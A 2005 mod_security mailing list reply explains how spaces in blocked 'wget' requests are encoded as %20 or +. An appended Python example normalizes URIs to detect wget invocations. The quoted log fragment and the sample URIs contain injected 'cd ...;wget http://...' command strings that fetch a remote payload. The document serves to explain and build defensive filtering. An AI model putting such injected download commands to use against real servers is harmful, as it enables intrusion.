Re: [mod-security-users] Wget filter
From: Oliver S. <Bor...@gm...> - 2005-01-27 23:43:24
Privet,

> 1) My logs always contain "wget+" but no "wget%" even if the following
> request was blocked "cd%20.temp22;wget%20http://".
> Why so? Why my log does not contain "wget%" at all?

%20 is the escaped version of a blank space. (0x20 is the hexadecimal representation of the character code 32 which is a blank space).

wget+ represents exactly the same, because blank space has two different representations in this encoding scheme: + and %20.

Seems that Apache internally decodes %20 but not + which is natural since + may be a valid filename character. Hence you would find "wget " but not "wget%".

By the way: this will only filter WGET calls (executing WGET), WGET itself allows to mimic any browser and cannot be blocked as a client.

Oliver

--
---------------------------------------------------
May the source be with you, stranger ;)

ICQ: #281645
URL: http://assarbad.net
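The two encodings of a space described in the reply above, as an added example that is not part of the original message: a Python check that normalizes a request URI before matching, so one rule covers both "wget%20" and "wget+" while leaving a literal "+" in a file name alone. The sample URIs, the `example.invalid` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample request URIs (not taken from the thread's logs).
SAMPLES = [
    "/cgi-bin/a.cgi?x=cd%20.temp22;wget%20http://example.invalid/f",  # %20 form
    "/cgi-bin/a.cgi?x=cd+.temp22;wget+http://example.invalid/f",      # + form
    "/downloads/wget-1.9.tar.gz",     # benign: "wget" not followed by a space
    "/pkg/wget+ssl.tar.gz",           # benign: '+' is a literal path character
]

# "wget" followed by whitespace, i.e. wget being invoked with an argument.
WGET_CALL = re.compile(r"\bwget\s", re.IGNORECASE)


def normalize(uri):
    """Return (path, query) decoded the way each part is meant to be read.

    Path: only %XX is decoded, because '+' is a valid file name character.
    Query: %XX and '+' are both decoded, because '+' encodes a space there.
    """
    path, _, query = uri.partition("?")
    return unquote(path), unquote_plus(query)


def is_wget_call(uri):
    """Match the rule against the normalized path and query."""
    path, query = normalize(uri)
    return bool(WGET_CALL.search(path) or WGET_CALL.search(query))


def naive_match(uri):
    """A literal filter on the raw text, which only sees the %20 form."""
    return "wget%20" in uri


if __name__ == "__main__":
    for uri in SAMPLES:
        print(f"naive={naive_match(uri)!s:5} normalized={is_wget_call(uri)!s:5} {uri}")
```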